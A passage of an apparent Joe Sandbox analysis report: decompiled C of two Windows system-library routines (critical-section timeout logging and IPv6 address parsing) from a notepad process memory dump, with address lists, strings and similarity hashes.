							E00AF3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00AF3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb820c0;
								if(_t85 != 0xb820c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00B2217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00AF3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                  0x00acec56
                                                  0x00acec56
                                                  0x00acec56
                                                  0x00acec5c
                                                  0x00acec64
                                                  0x00b023e6
                                                  0x00b023eb
                                                  0x00b023eb
                                                  0x00acec6a
                                                  0x00acec6c
                                                  0x00acec6f
                                                  0x00b023f3
                                                  0x00b023f8
                                                  0x00b023fa
                                                  0x00b023fc
                                                  0x00acec75
                                                  0x00acec76
                                                  0x00acec76
                                                  0x00acec7b
                                                  0x00acec7c
                                                  0x00acec7e
                                                  0x00b02406
                                                  0x00b02407
                                                  0x00b0240c
                                                  0x00b0240d
                                                  0x00b0240d
                                                  0x00b0240d
                                                  0x00b02414
                                                  0x00b02417
                                                  0x00b0241e
                                                  0x00b02435
                                                  0x00b02438
                                                  0x00b0243c
                                                  0x00b0243f
                                                  0x00b02442
                                                  0x00b02443
                                                  0x00b02446
                                                  0x00b02449
                                                  0x00b02453
                                                  0x00b02455
                                                  0x00b0245b
                                                  0x00b0245b
                                                  0x00aceb99
                                                  0x00aceb99
                                                  0x00aceb9c
                                                  0x00aceb9d
                                                  0x00aceb9f
                                                  0x00aceba2
                                                  0x00b02465
                                                  0x00b0246b
                                                  0x00b0246d
                                                  0x00aceba8
                                                  0x00aceba9
                                                  0x00aceba9
                                                  0x00acebae
                                                  0x00acebb3
                                                  0x00acebb9
                                                  0x00acebbb
                                                  0x00b02513
                                                  0x00b02514
                                                  0x00b02519
                                                  0x00b0251b
                                                  0x00acec2a
                                                  0x00acec2d
                                                  0x00acec33
                                                  0x00acec36
                                                  0x00acec3a
                                                  0x00acec3e
                                                  0x00acec40
                                                  0x00acec47
                                                  0x00acec47
                                                  0x00acec40
                                                  0x00aa22c6
                                                  0x00acebc1
                                                  0x00acebc1
                                                  0x00acebc5
                                                  0x00acec9a
                                                  0x00acec9a
                                                  0x00acebd6
                                                  0x00acebd6
                                                  0x00000000
                                                  0x00acebbb
                                                  0x00b02477
                                                  0x00b0247c
                                                  0x00b02486
                                                  0x00b0248b
                                                  0x00b02496
                                                  0x00b0249b
                                                  0x00b0249d
                                                  0x00b024a0
                                                  0x00b024a3
                                                  0x00b024aa
                                                  0x00b024aa
                                                  0x00b024a5
                                                  0x00b024a5
                                                  0x00b024a5
                                                  0x00b024ac
                                                  0x00b024af
                                                  0x00b024b0
                                                  0x00b024b3
                                                  0x00b024b9
                                                  0x00b024ba
                                                  0x00b024bb
                                                  0x00b024c6
                                                  0x00b024cb
                                                  0x00b024cd
                                                  0x00b024d0
                                                  0x00b024d1
                                                  0x00b024d4
                                                  0x00b024d6
                                                  0x00b024d9
                                                  0x00b024d9
                                                  0x00b024dc
                                                  0x00b024df
                                                  0x00b024e1
                                                  0x00b024e7
                                                  0x00b024e9
                                                  0x00b024ec
                                                  0x00b024ef
                                                  0x00b024f2
                                                  0x00b024f2
                                                  0x00b024ef
                                                  0x00b024e7
                                                  0x00b024fa
                                                  0x00b024ff
                                                  0x00b02501
                                                  0x00b02503
                                                  0x00b02506
                                                  0x00b0250b
                                                  0x00aceb8c
                                                  0x00aceb93
                                                  0x00000000
                                                  0x00000000
                                                  0x00aceb93
                                                  0x00000000
                                                  0x00aceb99
                                                  0x00acec85
                                                  0x00acec85
                                                  0x00acec85
                                                  0x00000000

                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 00B024FA
                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B0248D
                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B024BD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                  • API String ID: 0-3177188983
                                                  • Opcode ID: 869e2670ae23bcd1a7d615dbeff2838da892ee0789c0ebb76ac980487df036f6
                                                  • Instruction ID: c7188bcc32e34fda3d29d7867a49a803e8ac7a8982b6e13b8bda293b5bb7a04b
                                                  • Opcode Fuzzy Hash: 869e2670ae23bcd1a7d615dbeff2838da892ee0789c0ebb76ac980487df036f6
                                                  • Instruction Fuzzy Hash: 0341C271A04204AFDB20DB68CD89F6A7BF8EF85720F208649F655DB2D1D774E94187A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ADFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00ADFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00ADEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00ADEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00AD685D(_t167, 4) == 0) {
								if(E00AD685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00AD685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00AD685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00AB8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00AADFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00ADEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00ADEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                  0x00adfcd1
                                                  0x00adfcd6
                                                  0x00adfcd9
                                                  0x00adfcdc
                                                  0x00adfcdf
                                                  0x00adfce2
                                                  0x00adfce5
                                                  0x00adfce8
                                                  0x00adfceb
                                                  0x00adfced
                                                  0x00adfced
                                                  0x00adfcf3
                                                  0x00000000
                                                  0x00000000
                                                  0x00adfcfc
                                                  0x00adfcfe
                                                  0x00adfdc1
                                                  0x00b0ecbd
                                                  0x00000000
                                                  0x00b0eccc
                                                  0x00b0eccc
                                                  0x00b0ecd2
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ecdf
                                                  0x00b0ece0
                                                  0x00b0ece4
                                                  0x00b0eceb
                                                  0x00b0ecee
                                                  0x00b0eca8
                                                  0x00b0eca8
                                                  0x00b0ecaa
                                                  0x00adfd76
                                                  0x00adfd79
                                                  0x00adfdb4
                                                  0x00adfdb5
                                                  0x00adfdb6
                                                  0x00000000
                                                  0x00adfdb6
                                                  0x00adfd7e
                                                  0x00b0ecfc
                                                  0x00adfe2f
                                                  0x00000000
                                                  0x00adfe2f
                                                  0x00b0ed08
                                                  0x00b0ed0f
                                                  0x00b0ed17
                                                  0x00b0ed1b
                                                  0x00000000
                                                  0x00b0ed1b
                                                  0x00adfd88
                                                  0x00000000
                                                  0x00000000
                                                  0x00adfd94
                                                  0x00adfd99
                                                  0x00adfda1
                                                  0x00000000
                                                  0x00000000
                                                  0x00adfdb0
                                                  0x00000000
                                                  0x00adfdb0
                                                  0x00b0ecbd
                                                  0x00adfdc7
                                                  0x00adfdcb
                                                  0x00000000
                                                  0x00adfdd7
                                                  0x00adfde3
                                                  0x00adfe06
                                                  0x00af1fe7
                                                  0x00000000
                                                  0x00000000
                                                  0x00af1fef
                                                  0x00af1ff0
                                                  0x00af1ff4
                                                  0x00af1ff7
                                                  0x00af1ffa
                                                  0x00af1ffd
                                                  0x00af2000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ecf1
                                                  0x00000000
                                                  0x00b0ecf1
                                                  0x00000000
                                                  0x00adfe06
                                                  0x00adfde8
                                                  0x00adfdec
                                                  0x00adfdef
                                                  0x00adfdf2
                                                  0x00000000
                                                  0x00adfdf2
                                                  0x00adfdcb
                                                  0x00adfd04
                                                  0x00adfd05
                                                  0x00b0ec67
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ec6f
                                                  0x00000000
                                                  0x00b0ec6f
                                                  0x00adfd13
                                                  0x00adfd3c
                                                  0x00adfd40
                                                  0x00b0ec75
                                                  0x00b0ec7a
                                                  0x00000000
                                                  0x00b0ec8a
                                                  0x00b0ec8a
                                                  0x00b0ec90
                                                  0x00b0ecb2
                                                  0x00adfd73
                                                  0x00adfd73
                                                  0x00000000
                                                  0x00adfd73
                                                  0x00b0ec95
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eca1
                                                  0x00b0eca4
                                                  0x00b0eca5
                                                  0x00000000
                                                  0x00b0eca5
                                                  0x00b0ec7a
                                                  0x00adfd4a
                                                  0x00000000
                                                  0x00adfd6e
                                                  0x00adfd6e
                                                  0x00adfd71
                                                  0x00000000
                                                  0x00adfd71
                                                  0x00adfd4a
                                                  0x00adfd21
                                                  0x00aea3a1
                                                  0x00000000
                                                  0x00aea3a1
                                                  0x00adfd36
                                                  0x00af200b
                                                  0x00af2012
                                                  0x00000000
                                                  0x00000000
                                                  0x00af2018
                                                  0x00000000
                                                  0x00af2018
                                                  0x00000000
                                                  0x00adfd36
                                                  0x00adfe0f
                                                  0x00adfe16
                                                  0x00aea3ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00aea3b3
                                                  0x00aea3b3
                                                  0x00adfe1f
                                                  0x00b0ed25
                                                  0x00b0ed86
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ed91
                                                  0x00b0ed95
                                                  0x00b0ed95
                                                  0x00b0ed9a
                                                  0x00b0edad
                                                  0x00b0edb3
                                                  0x00b0edba
                                                  0x00b0edc4
                                                  0x00b0edc9
                                                  0x00000000
                                                  0x00b0edcc
                                                  0x00b0ed2a
                                                  0x00b0ed55
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ed61
                                                  0x00b0ed66
                                                  0x00b0ed6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ed7d
                                                  0x00000000
                                                  0x00b0ed7d
                                                  0x00b0ed30
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ed3c
                                                  0x00b0ed43
                                                  0x00b0ed4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID:
                                                  • API String ID: 3965848254-0
                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                  • Instruction ID: 46c7b780ba6727e986d7980db23e8327a5adf5d94968f1c0b6a916f89db99a5f
                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                  • Instruction Fuzzy Hash: 56918F31D0024AEFDF24DF98C8456AFBBB5FB55304F24847BD453A62A2EB309A41DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%